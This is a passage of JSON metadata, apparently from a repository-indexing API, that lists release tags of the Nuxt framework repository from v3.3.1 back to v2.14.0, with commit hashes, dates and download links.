fests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638c